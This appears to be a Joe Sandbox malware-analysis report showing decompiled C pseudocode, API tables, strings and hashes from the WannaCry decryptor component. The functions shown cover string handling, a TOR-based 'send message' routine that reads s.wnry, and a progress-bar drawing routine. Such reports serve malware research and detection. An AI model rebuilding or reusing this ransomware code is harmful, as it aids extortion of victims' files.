									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

















































                                  0x00405236
                                  0x00405238
                                  0x0040523d
                                  0x0040523e
                                  0x0040524b
                                  0x0040524e
                                  0x00405254
                                  0x00405369
                                  0x00405552
                                  0x0040555a
                                  0x00405560
                                  0x00405568
                                  0x00405572
                                  0x00405572
                                  0x0040536f
                                  0x00405373
                                  0x0040539e
                                  0x0040539e
                                  0x004053a1
                                  0x004053a4
                                  0x00405430
                                  0x00405433
                                  0x004054b4
                                  0x004054b6
                                  0x00405503
                                  0x00405506
                                  0x00000000
                                  0x00000000
                                  0x0040550b
                                  0x0040550e
                                  0x00405511
                                  0x00405516
                                  0x00405517
                                  0x00405519
                                  0x0040551b
                                  0x00000000
                                  0x00000000
                                  0x0040551d
                                  0x0040551f
                                  0x00000000
                                  0x00000000
                                  0x00405521
                                  0x00405523
                                  0x00405525
                                  0x00000000
                                  0x00000000
                                  0x00405527
                                  0x00405529
                                  0x00405534
                                  0x00405535
                                  0x00405536
                                  0x0040553e
                                  0x00405542
                                  0x00405545
                                  0x0040554a
                                  0x0040554d
                                  0x0040554f
                                  0x0040554f
                                  0x0040554f
                                  0x00000000
                                  0x00405529
                                  0x004054bb
                                  0x004054be
                                  0x004054c1
                                  0x004054c6
                                  0x004054c7
                                  0x004054c9
                                  0x004054cb
                                  0x004054d1
                                  0x004054d1
                                  0x004054d6
                                  0x004054d6
                                  0x004054d8
                                  0x004054da
                                  0x00000000
                                  0x00000000
                                  0x004054dc
                                  0x004054de
                                  0x004054e6
                                  0x004054e7
                                  0x004054ea
                                  0x004054ef
                                  0x004054f1
                                  0x004054f4
                                  0x004054f9
                                  0x004054fc
                                  0x004054fe
                                  0x004054fe
                                  0x004054fe
                                  0x00000000
                                  0x00405501
                                  0x004054cd
                                  0x004054cf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054cf
                                  0x0040543b
                                  0x0040543f
                                  0x00405440
                                  0x00405443
                                  0x0040544f
                                  0x00405450
                                  0x00405453
                                  0x0040545b
                                  0x00405468
                                  0x0040546b
                                  0x0040546c
                                  0x0040546d
                                  0x00405471
                                  0x00405476
                                  0x00405479
                                  0x0040547e
                                  0x00405487
                                  0x0040548b
                                  0x00405494
                                  0x00405499
                                  0x004054a2
                                  0x004054aa
                                  0x00000000
                                  0x004054aa
                                  0x004053b4
                                  0x004053b5
                                  0x004053b8
                                  0x004053c3
                                  0x004053d1
                                  0x004053d5
                                  0x004053d6
                                  0x004053d7
                                  0x004053dc
                                  0x004053dd
                                  0x004053e7
                                  0x004053e8
                                  0x004053e9
                                  0x004053ed
                                  0x004053f2
                                  0x004053f5
                                  0x004053fa
                                  0x00405403
                                  0x00405407
                                  0x00405410
                                  0x00405415
                                  0x0040541e
                                  0x00405426
                                  0x00000000
                                  0x00405426
                                  0x0040537b
                                  0x00405381
                                  0x00405384
                                  0x00405386
                                  0x00000000
                                  0x00000000
                                  0x00405388
                                  0x0040538a
                                  0x0040538c
                                  0x00000000
                                  0x00000000
                                  0x0040538e
                                  0x00405390
                                  0x00405393
                                  0x00405396
                                  0x0040539b
                                  0x0040539b
                                  0x0040539b
                                  0x00000000
                                  0x00405390
                                  0x0040525d
                                  0x00405285
                                  0x00405288
                                  0x0040528d
                                  0x004052f9
                                  0x004052fa
                                  0x004052fb
                                  0x004052fc
                                  0x00405303
                                  0x00405307
                                  0x00405309
                                  0x0040530c
                                  0x00405314
                                  0x00405319
                                  0x00405320
                                  0x00405321
                                  0x00405322
                                  0x00405326
                                  0x0040532b
                                  0x0040532e
                                  0x00405333
                                  0x0040533c
                                  0x00405340
                                  0x00405349
                                  0x0040534e
                                  0x00405357
                                  0x0040535f
                                  0x0040528f
                                  0x00405295
                                  0x00405297
                                  0x00405298
                                  0x0040529c
                                  0x004052a0
                                  0x004052a9
                                  0x004052b1
                                  0x004052b2
                                  0x004052b3
                                  0x004052b7
                                  0x004052b8
                                  0x004052bd
                                  0x004052c0
                                  0x004052c5
                                  0x004052ce
                                  0x004052d3
                                  0x004052dc
                                  0x004052e4
                                  0x004052e4
                                  0x00000000
                                  0x0040528d
                                  0x00405265
                                  0x00405268
                                  0x0040526d
                                  0x00000000
                                  0x00000000
                                  0x0040526f
                                  0x00405273
                                  0x00000000
                                  0x00000000
                                  0x00405275
                                  0x00405277
                                  0x0040527a
                                  0x0040527d
                                  0x00405282
                                  0x00405282
                                  0x00000000

                                  APIs
                                  • #940.MFC42(?), ref: 0040527D
                                  • #4277.MFC42(?,00000001), ref: 004052A0
                                  • #923.MFC42(?,00000000,?), ref: 004052B8
                                  • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                  • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                  • #4129.MFC42(?,?), ref: 004052FC
                                  • #5710.MFC42 ref: 00405314
                                  • #922.MFC42(?,00000000,00000000), ref: 00405326
                                  • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                  • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                  • #940.MFC42(?), ref: 00405396
                                  • #5710.MFC42(?,?), ref: 004053B8
                                  • #4129.MFC42(?,?,?,?), ref: 004053D7
                                  • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                  • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                  • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                  • #4129.MFC42(?,?), ref: 00405443
                                  • #4277.MFC42(?,?,?,?), ref: 0040545B
                                  • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                  • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                  • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                  • #6778.MFC42(?,00000001), ref: 004054EA
                                  • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                  • #6778.MFC42(00000000,?), ref: 00405536
                                  • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                  • String ID:
                                  • API String ID: 2121400562-0
                                  • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                  • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                  • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb");
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107);
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                  0x004082c0
                                  0x004082c2
                                  0x004082cd
                                  0x004082ce
                                  0x004082d5
                                  0x004082df
                                  0x004082ea
                                  0x004082f1
                                  0x004082f9
                                  0x004082fb
                                  0x00408304
                                  0x00408305
                                  0x0040830d
                                  0x00408312
                                  0x0040831a
                                  0x00408322
                                  0x0040832b
                                  0x00408332
                                  0x00408332
                                  0x00408342
                                  0x00408378
                                  0x0040837f
                                  0x00408381
                                  0x00408387
                                  0x00408391
                                  0x00408396
                                  0x0040844d
                                  0x0040844e
                                  0x00408450
                                  0x00408456
                                  0x00408459
                                  0x0040845b
                                  0x00408460
                                  0x004083af
                                  0x004083af
                                  0x004083b5
                                  0x0040846c
                                  0x00408477
                                  0x00408485
                                  0x00408487
                                  0x0040848d
                                  0x0040848f
                                  0x00408492
                                  0x00408494
                                  0x004084c2
                                  0x004084c9
                                  0x004084e2
                                  0x004084ee
                                  0x004084f3
                                  0x004084fa
                                  0x004084fb
                                  0x004084fc
                                  0x00408501
                                  0x00408504
                                  0x00408506
                                  0x0040850b
                                  0x00408512
                                  0x00408514
                                  0x00408538
                                  0x0040853a
                                  0x0040853c
                                  0x0040853d
                                  0x0040853f
                                  0x00408544
                                  0x00408544
                                  0x00408516
                                  0x00408516
                                  0x00408518
                                  0x00408522
                                  0x00408528
                                  0x0040852e
                                  0x00408531
                                  0x00408531
                                  0x00408518
                                  0x00408550
                                  0x0040855b
                                  0x00408560
                                  0x00408496
                                  0x0040849d
                                  0x004084a8
                                  0x004084ad
                                  0x004084ad
                                  0x00408562
                                  0x0040856d
                                  0x0040857a
                                  0x0040857a
                                  0x004083bb
                                  0x004083c2
                                  0x004083c8
                                  0x004083ce
                                  0x004083d6
                                  0x004083d8
                                  0x004083f5
                                  0x004083fd
                                  0x00408403
                                  0x00408404
                                  0x00408409
                                  0x0040840a
                                  0x0040840f
                                  0x00408413
                                  0x00408416
                                  0x00408417
                                  0x00408418
                                  0x00408419
                                  0x00408422
                                  0x00408429
                                  0x00408429
                                  0x00408435
                                  0x00408440
                                  0x00408445
                                  0x00000000
                                  0x00408445
                                  0x00408466
                                  0x00000000
                                  0x00408466
                                  0x0040839c
                                  0x004083a1
                                  0x004083a3
                                  0x00000000
                                  0x00000000
                                  0x004083a9
                                  0x004083a9
                                  0x004083aa
                                  0x00000000
                                  0x004083aa
                                  0x0040834b
                                  0x0040834d
                                  0x0040834e
                                  0x0040834f
                                  0x00408354
                                  0x00408354
                                  0x00408360
                                  0x0040836b
                                  0x00408370
                                  0x00000000

                                  APIs
                                  • #4278.MFC42(000003E8,00000000,000003E8,?,?,75F15C80), ref: 0040830D
                                  • #858.MFC42 ref: 00408322
                                  • #800.MFC42 ref: 00408332
                                  • #1200.MFC42(Too short message!,00000000,00000000,?,?,75F15C80), ref: 00408354
                                  • #800.MFC42 ref: 0040836B
                                  • time.MSVCRT ref: 0040837F
                                  • #540.MFC42 ref: 004083C8
                                  • time.MSVCRT ref: 004083D6
                                  • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                  • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                  • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                  • #800.MFC42 ref: 00408440
                                  • time.MSVCRT ref: 0040844E
                                  • fopen.MSVCRT ref: 00408487
                                  • #800.MFC42 ref: 004084A8
                                  • fread.MSVCRT ref: 004084C2
                                  • fclose.MSVCRT ref: 004084C9
                                  • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                  • time.MSVCRT ref: 00408528
                                  • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                  • #800.MFC42 ref: 0040855B
                                  Strings
                                  • Your message has been sent successfully!, xrefs: 0040851D
                                  • 00000000.res, xrefs: 00408480
                                  • s.wnry, xrefs: 004084DD
                                  • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                  • Too short message!, xrefs: 0040834F
                                  • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                  • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                  • API String ID: 1233543560-382338106
                                  • Opcode ID: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                  0x004086e0
                                  0x004086e0
                                  0x004086e0
                                  0x004086e2
                                  0x004086ed
                                  0x004086ee
                                  0x004086fd
                                  0x00408700
                                  0x00408708
                                  0x00408718
                                  0x0040871f
                                  0x00408736
                                  0x00408742
                                  0x00408743
                                  0x00408746
                                  0x0040874f
                                  0x00408758
                                  0x00408760
                                  0x00408765
                                  0x0040876d
                                  0x0040877d
                                  0x00408789
                                  0x00408791
                                  0x00408795
                                  0x00408799
